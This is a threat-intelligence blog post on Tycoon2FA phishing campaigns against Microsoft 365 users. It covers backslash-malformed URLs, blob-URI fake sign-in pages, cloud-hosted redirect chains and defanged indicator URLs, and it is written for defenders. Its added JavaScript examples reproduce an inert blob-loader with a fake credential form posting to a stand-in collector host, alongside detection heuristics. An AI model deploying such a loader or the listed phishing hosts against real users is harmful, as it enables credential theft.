Protect Yourself: Tycoon2FA Group Attacking Microsoft 365 Users with Phishing Scams

Background

Security researchers have recently observed a wave of phishing campaigns aimed at Microsoft 365 users. The campaigns are run with Tycoon2FA, a widely used phishing-as-a-service (PhaaS) platform whose operators also rent it out to other criminals. The goal is to capture Microsoft 365 credentials (and, because the kit relays the victim's sign-in to the real Microsoft login, the MFA-approved session that follows) in order to take over the account.

The phishing emails impersonate official Microsoft notifications, such as security alerts or multi-factor authentication (MFA, commonly called 2FA) prompts, to create urgency and push users into clicking the embedded links.

Who is Tycoon2FA?

Tycoon2FA is a well-known cybercriminal operation built around Phishing-as-a-Service (PhaaS). Besides running attacks themselves, its operators develop and rent out the phishing kit, hosting and support to other attackers. This is an outsourcing model: anyone can stand up a phishing campaign with it, and users of popular cloud platforms such as Microsoft 365 are the primary target.

What sets Tycoon2FA apart is how quickly its techniques are updated. Alongside conventional lures, the kit uses tricks such as deliberately malformed URLs and multi-hop redirect chains, designed to slip past the URL-rewriting and link-scanning layers in email gateways and browsers that many organizations rely on.

Tycoon2FA also stages its chains on legitimate cloud infrastructure such as Microsoft Azure (Front Door endpoints), Cloudflare Workers and Google's DoubleClick ad-click redirector. A first hop on a domain that sits on every allow-list lends the lure credibility, and content hosted on shared cloud platforms is hard to block or take down without collateral damage.

The group's lures are frequently themed as MFA prompts or security alerts. Because users now expect to see such prompts, a fake one does not look out of place, which makes the theme effective precisely in organizations that have rolled out MFA.

Tycoon2FA is an example of the broader shift toward professional, systematic phishing service models: the operators are both attackers and suppliers of tooling and tradecraft to the wider criminal community, which keeps raising the bar for defenders.

Technical Analysis

Below are the main techniques the group uses in these campaigns:

Malformed URLs Technique

The attackers write URLs with backslashes in place of the forward slashes after the scheme, for example https:\\ instead of https://. This is deliberate: many email security filters extract links with a pattern that expects the literal ://, so a backslash variant is either not recognized as a URL at all or is scored as low risk and left unrewritten.

Browsers, however, implement the WHATWG URL standard, which treats a backslash as equivalent to a forward slash for http and https URLs, so the link is silently normalized and the user lands on the phishing site anyway. The gap between what the filter parses and what the browser parses is the blind spot the attackers exploit.

Blob URI Technique to Avoid Detection

Another technique observed recently abuses blob URIs (Uniform Resource Identifiers): addresses of the form blob:<origin>/<uuid> that a page creates with URL.createObjectURL() to reference data held in the browser's own memory, typically temporary images, audio or video.

In these campaigns the email does not link directly to a malicious site, which scanners would catch, but to a legitimate intermediary page such as onedrive.live.com. From there the victim is redirected to an attacker-controlled HTML page whose script assembles the entire phishing page as a Blob in the victim's browser and navigates to the resulting blob URI.

Figure 1. A blob URI page impersonating the OneDrive login page

The key property is that a blob URI exists only inside the browser that created it: it is bound to that page's origin and browsing context, and nothing is served from the network, so URL reputation services, sandboxes that fetch links and email scanners cannot retrieve or preview what it shows. The user sees a convincing copy of the Microsoft or OneDrive login page and is easily tricked into entering credentials. Note, however, that the attacker-controlled loader page that creates the blob does cross the network, as does the request that exfiltrates the submitted credentials, so those two points remain available for inspection and detection.
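The following added example (not from the original post) reproduces the loader step exactly as the page describes it and then shows the defender's side: since the blob: URL itself can never be fetched, a scanner has to work on the loader HTML. Node exposes Blob and URL.createObjectURL with browser semantics, so the first function runs unchanged in either environment. The loader page, the collector hostname and the fake form are constructed and deliberately inert.

```javascript
// Node >= 18 has Blob as a global; older versions expose it from node:buffer.
const BlobCtor = globalThis.Blob ?? require('node:buffer').Blob;

// What the loader page does in the victim's browser: wrap the phishing HTML in
// an in-memory Blob and hand back a blob: URL to navigate to. The URL is scoped
// to this origin and browsing context; nothing is requested from any server.
function buildBlobUrl(phishHtml) {
  const blob = new BlobCtor([phishHtml], { type: 'text/html' });
  return URL.createObjectURL(blob); // browser: blob:https://origin/<uuid>, Node: blob:nodedata:<uuid>
}

// Constructed, inert stand-in for the fake sign-in form. The real kit's form
// would post to a collector the attacker controls; this hostname is made up.
const FAKE_FORM =
  '<form action="https://collector.example.test/post">' +
  '<input name="loginfmt"><input name="passwd" type="password"></form>';

// Constructed loader page: the form travels as base64, so grepping the loader
// for "password" or "Sign in" finds nothing, while the browser sees everything.
const LOADER_HTML = `<!doctype html><html><body><script>
  var p = atob("${Buffer.from(FAKE_FORM).toString('base64')}");
  var b = new Blob([p], { type: "text/html" });
  window.location.replace(URL.createObjectURL(b));
</script></body></html>`;

// Static heuristic for a loader page: an HTML-typed Blob turned into an object
// URL that the page then navigates to. Each signal alone is common in ordinary
// web apps; all of them together on a page reached from a mail link is the tell.
function looksLikeBlobLoader(html) {
  const signals = [
    /new\s+Blob\s*\(/.test(html),
    /type\s*:\s*["']text\/html["']/.test(html),
    /URL\.createObjectURL\s*\(/.test(html),
    /(location\.(href|replace|assign)|window\.open)/.test(html),
  ];
  return signals.every(Boolean);
}

// Recover base64 literals fed to atob() so their content can be scanned; this
// is what a scanner must do instead of trying to fetch the blob: URL.
function decodeInlineBase64(html) {
  const out = [];
  for (const [, lit] of html.matchAll(/atob\(\s*["']([A-Za-z0-9+\/=]+)["']\s*\)/g)) {
    out.push(Buffer.from(lit, 'base64').toString('utf8'));
  }
  return out;
}

console.log('blob URL created   :', buildBlobUrl('<h1>demo</h1>'));
console.log('loader heuristic   :', looksLikeBlobLoader(LOADER_HTML));
console.log('decoded payloads   :', decodeInlineBase64(LOADER_HTML));
```

The heuristic is intentionally narrow; tune the last signal to the navigation idiom seen in your own samples, and treat a hit as a reason to detonate the loader in a real browser sandbox rather than as a verdict on its own.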

Figure 2. Infection chain of Blob URI phishing attack

Using Legitimate Cloud Platforms as "Disposable Infrastructure"

Phishing pages are hosted on reputable cloud platforms such as Microsoft Azure (Front Door endpoints under azurefd.net), Cloudflare Workers (workers.dev) and, as the first hop, Google's DoubleClick click redirector. Tenants on these platforms are cheap, anonymous and quick to replace: a takedown removes one instance while the next is already live, and blanket blocking of the parent domains is not an option for most organizations.

Complex Redirect Chains and Trusted Service Emulation

Phishing emails typically link first to a legitimate intermediary page, which keeps the email itself clean in the eyes of security systems. The intermediary forwards the user to attacker-controlled HTML pages that mimic the Microsoft 365 or OneDrive sign-in pages. With DoubleClick, the real destination travels percent-encoded in the adurl query parameter (see the IOC table below), so a naive string match on the link sees only a Google domain.

Using Fake Domains

The attack infrastructure uses domains and subdomains that resemble legitimate services (the microsftmailonline… host in the IOC table is one example), which raises the credibility and success rate of the social engineering.

IOCs Related to Tycoon2FA Campaign

Each IOC URL is listed defanged, with its description on the following line:

hxxps[://]microsftmailonlinenyukmvdx2t[.]lgotsna[.]es/
    Typo-squatted domain targeting M365 users

hxxps[://]googleads[.]g[.]doubleclick[.]net/pcs/click?adurl=%68%74%74%70%73%3A%2F%2F%34[…]%6E%65%74#
    Redirect via encoded ad link

hxxps[://]783784387348438743-fkhghccdfzc8e8cd[.]z02[.]azurefd[.]net/
    Azure-hosted phishing page

hxxps[://]4839794398349343-g4eydqdkguhcdvgs[.]z02[.]azurefd[.]net
    Azure-hosted credential harvesting site

hxxps[://]sdnxk0t5-q[.]alt-bq-4o27qr9a[.]workers[.]dev
    Cloudflare Workers disposable phishing

hxxps[://]9kp6wgtaqr[.]cloudflareemail2109399[.]workers[.]dev
    Cloudflare Workers disposable phishing
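The redirect-chain, fake-domain and disposable-hosting sections above all come together when a gateway or log parser has to decide what a link really points at. The added example below (not code from the original post) refangs the IOCs, unwraps the DoubleClick adurl parameter the way the redirector does, and tags the final host with the hosting and lookalike signals visible in the table. The DoubleClick sample is constructed because the real adurl value in the table is elided; the azurefd.net and workers.dev suffixes are hosting signals taken from the table, not a blocklist, since legitimate tenants share them.

```javascript
// Defanged "hxxps[://]host[.]tld" back to a parseable URL.
function refang(ioc) {
  return ioc.trim()
    .replace(/^hxxp/i, 'http')
    .replace(/\[:\/\/\]/g, '://')
    .replace(/\[\.\]/g, '.');
}

// Percent-encode every byte, as the campaign does for adurl (%68%74%74%70%73
// is "https"), so a string match for "https://" on the raw link misses it.
function percentEncodeAll(s) {
  return Array.from(Buffer.from(s, 'utf8'),
    b => '%' + b.toString(16).toUpperCase().padStart(2, '0')).join('');
}

// Follow a DoubleClick click-tracker to its real target. searchParams.get()
// decodes the %xx sequences, which is exactly what the redirector does.
function resolveAdRedirect(url) {
  const u = new URL(url);
  if (!/(^|\.)doubleclick\.net$/.test(u.hostname)) return null;
  const target = u.searchParams.get('adurl');
  if (!target) return null;
  try { return new URL(target).href; } catch { return null; }
}

// Hosting suffixes seen in the IOC table (signals, not verdicts).
const DISPOSABLE_SUFFIXES = ['.azurefd.net', '.workers.dev'];
// Brand tokens that have no business in a hostname outside Microsoft's own.
const BRAND_TOKENS = /micros?o?ft|mailonline|onedrive|office|365/i;
const LEGIT_SUFFIX = /(^|\.)(microsoft|microsoftonline|office|live)\.com$/i;

// Classify one link (raw or defanged) as the victim's browser will end up seeing it.
function classifyLink(rawOrDefanged) {
  const url = refang(rawOrDefanged);
  const viaAd = resolveAdRedirect(url);
  const finalUrl = viaAd ?? new URL(url).href;
  const host = new URL(finalUrl).hostname;
  return {
    finalUrl,
    host,
    redirected: viaAd !== null,
    disposableHosting: DISPOSABLE_SUFFIXES.some(s => host.endsWith(s)),
    brandLookalike: BRAND_TOKENS.test(host) && !LEGIT_SUFFIX.test(host),
  };
}

// Constructed sample chain (hypothetical tenant): ad-click redirector -> Azure Front Door.
const SAMPLE_AD_LINK = 'https://googleads.g.doubleclick.net/pcs/click?adurl=' +
  percentEncodeAll('https://1234567890-example.z02.azurefd.net/') + '#';

const SAMPLE_IOCS = [
  SAMPLE_AD_LINK,
  'hxxps[://]microsftmailonlinenyukmvdx2t[.]lgotsna[.]es/',
  'hxxps[://]sdnxk0t5-q[.]alt-bq-4o27qr9a[.]workers[.]dev',
];
for (const ioc of SAMPLE_IOCS) console.log(classifyLink(ioc));
```

Run this over the URLs a proxy actually logged rather than over the email alone: the browser-side chain (intermediary page, encoded redirect, final tenant) is what the user experienced, and the final host is what belongs in the incident ticket.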

Recommendations

FPT Threat Intelligence recommends that organizations and individuals take the following measures against this campaign:

  • Update and Upgrade Email Security Systems: Organizations using Microsoft 365 should make sure their mail filters extract and rewrite links with a parser that tolerates backslashes and other malformed forms, and that they follow redirect chains (including encoded parameters such as adurl) rather than judging a link by its first hop.

  • Enhance Browser Protection: Block newly identified malicious domains at the proxy or DNS layer and warn users about suspicious pages. Since blob: content can never be fetched by a scanner, rely on browser-side protection (for example Microsoft Defender SmartScreen or web filtering) and on the loader page and credential-collection endpoints, which do traverse the network.

  • Raise User Awareness: Train users to recognize phishing emails, especially unexpected MFA requests or security alerts, and to check the URL in the address bar before entering credentials. Where possible, move high-value accounts to phishing-resistant MFA (FIDO2 security keys or passkeys), which a relayed sign-in page cannot replay.

  • Behavior Analysis and AI Application: Use user behavior analytics and AI-based tools to detect early warning signs, such as anomalous sign-ins that follow a click (new device, unfamiliar location, impossible travel) and unusual patterns in email interaction and web access.

  • Monitor and Handle Attack Infrastructure: Track the domains and cloud tenants abused to host phishing content, report them to the hosting providers, and feed them into blocklists promptly.


Written by Tran Hoang Phong
Just a SOC Analyst ^^